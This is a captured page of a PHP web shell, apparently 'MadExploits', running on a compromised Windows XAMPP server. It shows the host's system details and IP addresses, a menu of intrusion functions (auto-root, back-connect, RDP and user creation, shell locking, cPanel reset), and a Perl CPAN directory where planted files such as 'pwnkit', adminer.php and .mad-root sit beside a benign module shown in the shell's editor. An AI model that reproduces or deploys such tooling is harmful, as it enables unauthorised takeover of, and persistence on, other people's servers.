Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
lib /
CPAN /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
FTP
[ DIR ]
drwxrwxrwx
HTTP
[ DIR ]
drwxrwxrwx
Kwalify
[ DIR ]
drwxrwxrwx
LWP
[ DIR ]
drwxrwxrwx
Meta
[ DIR ]
drwxrwxrwx
Plugin
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Admin.pm
7.61
KB
-rw-rw-rw-
Author.pm
6.68
KB
-rw-rw-rw-
Bundle.pm
9.91
KB
-rw-rw-rw-
CacheMgr.pm
7.48
KB
-rw-rw-rw-
Complete.pm
5.88
KB
-rw-rw-rw-
Config.pm
4.11
KB
-rw-rw-rw-
Debug.pm
2.05
KB
-rw-rw-rw-
DeferredCode.pm
189
B
-rw-rw-rw-
DistnameInfo.pm
4.99
KB
-rw-rw-rw-
Distribution.pm
175.59
KB
-rw-rw-rw-
Distroprefs.pm
11.71
KB
-rw-rw-rw-
Distrostatus.pm
972
B
-rw-rw-rw-
FTP.pm
42.28
KB
-rw-rw-rw-
FirstTime.pm
71.84
KB
-rw-rw-rw-
HandleConfig.pm
22.98
KB
-rw-rw-rw-
Index.pm
21.7
KB
-rw-rw-rw-
InfoObj.pm
6.75
KB
-rw-rw-rw-
Kwalify.pm
3.35
KB
-rw-rw-rw-
Meta.pm
29.56
KB
-rw-rw-rw-
Mirrors.pm
17.82
KB
-rw-rw-rw-
Module.pm
21.87
KB
-rw-rw-rw-
Nox.pm
953
B
-rw-rw-rw-
Plugin.pm
3.14
KB
-rw-rw-rw-
Prompt.pm
567
B
-rw-rw-rw-
Queue.pm
6.96
KB
-rw-rw-rw-
Shell.pm
71.96
KB
-rw-rw-rw-
Tarzip.pm
16.25
KB
-rw-rw-rw-
URL.pm
588
B
-rw-rw-rw-
Version.pm
4.29
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Nox.pm
package CPAN::Nox; use strict; use vars qw($VERSION @EXPORT); BEGIN{ $CPAN::Suppress_readline=1 unless defined $CPAN::term; } use Exporter (); @CPAN::ISA = ('Exporter'); use CPAN; $VERSION = "5.5001"; $CPAN::META->has_inst('Digest::MD5','no'); $CPAN::META->has_inst('LWP','no'); $CPAN::META->has_inst('Compress::Zlib','no'); @EXPORT = @CPAN::EXPORT; *AUTOLOAD = \&CPAN::AUTOLOAD; 1; __END__ =head1 NAME CPAN::Nox - Wrapper around CPAN.pm without using any XS module =head1 SYNOPSIS Interactive mode: perl -MCPAN::Nox -e shell; =head1 DESCRIPTION This package has the same functionality as CPAN.pm, but tries to prevent the usage of compiled extensions during its own execution. Its primary purpose is a rescue in case you upgraded perl and broke binary compatibility somehow. =head1 LICENSE This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO L<CPAN> =cut
Close